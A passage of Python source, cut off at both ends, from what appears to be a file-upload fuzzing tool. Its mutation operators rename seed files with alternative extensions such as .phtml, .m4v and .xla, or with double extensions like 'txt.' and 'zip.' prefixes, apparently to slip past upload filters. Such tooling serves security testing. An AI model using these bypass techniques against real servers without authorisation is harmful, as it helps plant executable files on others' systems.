'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}# ['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4PHTML'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'phtml'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.phtml'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m12_txt.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}
 8 |                         # operations in this list can be used to extra mutation.
 9 | 
10 | # 'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'],
11 | # 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX']
12 |   __resource__ = {} # ({type:resource filename})
13 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
14 | 
15 |   def operation(self, output, seed_file, resource_file=None):
16 |       if output['filename'] != None and len(output['filename']) > 0:
17 |         filename = output['filename']
18 |       else:
19 |         filename = utils.extract_filename(seed_file)
20 | 
21 |       output['filename'] = filename + '_M12TXT'
22 | 
23 |       output['fileext'] = 'txt.'+output['fileext']
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_m4v.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_M4V','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M12_M4V','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP','M12_XHT'],'xhtml':['M12_M4V','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP'],'js':['M12_HTML','M12_XHTML','M12_M4V','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M12_JPG', 'M12_PNG', 'M12_GIF']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M4M4V'
19 |       output['fileext'] = 'm4v'
20 | 


--------------------------------------------------------------------------------
/mutation_op/m04_xla.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_XLA','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M12_XLA','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP', 'M12_XHT'],'xhtml':['M12_XLA','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP'],'js':['M12_HTML','M12_XHTML','M12_XLA','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M12_JPG', 'M12_PNG', 'M12_GIF']}# ['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M4XLA'
19 |       output['fileext'] = 'xla'
20 | 


--------------------------------------------------------------------------------
/mutation_op/m04_gzip.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_GZIP','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M12_GZIP','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP','M12_XHT'],'xhtml':['M12_GZIP','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP'],'js':['M12_HTML','M12_XHTML','M12_GZIP','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M12_JPG', 'M12_PNG', 'M12_GIF']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M4GZIP'
19 |       output['fileext'] = 'gzip'
20 | 


--------------------------------------------------------------------------------
/mutation_op/m04_pages.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_PAGES','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M12_PAGES','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP', 'M12_XHT'],'xhtml':['M12_PAGES','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10','M12_BZ2', 'M12_BZ2', 'M12_GIF', 'M12_JPG', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_ZIP'],'js':['M12_HTML','M12_XHTML','M12_PAGES','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M12_JPG', 'M12_GIF', 'M12_PNG']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M4PAGES'
19 |       output['fileext'] = 'pages'
20 | 


--------------------------------------------------------------------------------
/mutation_op/m12_zip.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}# ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12ZIP'
19 | 
20 |       output['fileext'] = 'zip.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m10.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation10: Change Extensions to Not commonly used"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
